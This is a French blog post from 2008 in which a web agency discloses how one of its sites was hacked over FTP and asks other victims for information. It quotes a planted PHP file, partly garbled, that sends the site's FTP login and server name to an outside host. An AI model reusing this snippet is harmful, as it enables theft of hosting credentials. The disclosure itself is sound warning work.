techno
Site hacké craqué
© Christophe - accéder à la source NEOMA Interactive - infos
10.07.08 | 11:16
Journaux
Imprimer
Découvert il y a quelques jours,un de nos sites a été violé par un hacker qui s’est gentillement introduit sur le FTP. Les motifs ou l’origine n’ayant toujours aucune explication, il est bon de détailler ici la méthode de crack afin de diffuser l’information.
L’auteur (sûrement un robot puisque selon les logs l’opération s’effectue en 9 secondes !) installe dans le fichier d’index principal (.html, .php ou autre) dès la première ligne l’entête suivant :
Parallèlement il crée un répertoire UPLDR/ contenant deux fichiers : “already.sent” et “gogo.php”. Ce dernier contient : $ftp_name ="ftp:/monlogin_ftp:monmotdepasse_ftpftp.monadressedomaine.com";
$remote_host = "http:/alojados.com/images/put.php";
if (file_exists("already.sent"))
{
exit(0);
} else
{
$fp = fopen("already.sent", "w");
fclose($fp);
}
?>
$remote_host."?srv=".$_SERVER['SERVER_NAME']."&ftp=".$ftp_name;?>">Malin ! Le véritable travail s’effectue sur le fameux fichier distant “put.php” permettant de naviguer tranquillement sur le FTP du site puisque les accès log/pass sont récupérés.
La recherche du propriétaire du domaine nous conduit à Séville en Espagne. Mais vue l’ampleur de l’attaque, puisque de nombreux sites français et allemands ont été également touchés depuis le 21 juin 2008, je pense que les informations trouvées si facilement cache un hacking plus ambitieux que l’unique fait d’un ‘petit cracker qui s’amuse’…
La question à résoudre est :comment les accès FTP ont pu être dérobés ?
Constats communs aux sites victimes :
- ils ont été développés avec des CMS différents et de versions différentes ;
- certains n’ont pas de CMS : ainsi le notre n’est qu’une page html appelant un swf via SWFobject ;
- ils sont parfois administrés par des logiciels FTP (type Filezilla, voire DreamWeaver), parfois directement administrés en FTP depuis un navigateur web ;
- ils ont des hébergeurs différents avec des services d’hébergement différents ;
- les accès ftp ont pour certains été échangés en interne par mail, d’autre jamais !
Alerté, de notre côté un contact technique chez OVH n’a pas trouvé d’autres réponses que : “vous devez mettre à jour votre CMS !”. Point final de l’échange possible = no comment !
Si vous avez vécu ou vivez la même expérience, si vous avez plus d’explication sur le schmilblick, n’hésitez pas à intervenir ou à prendre contact directement avec nous.
hébergement,webdéveloppementCatégorie :General
Vous pouvezlaisser un commentaire, oufaire un trackbackdepuis votre propre site.
Laisser un commentaire
Nom (requis)
Adresse e-mail (ne sera pas publiée) (requis)
Site Web
M'avertir des nouveaux commentaires sur ce billet par email !
Tags : techno
Journaux : Webstandards et accessibilité numérique
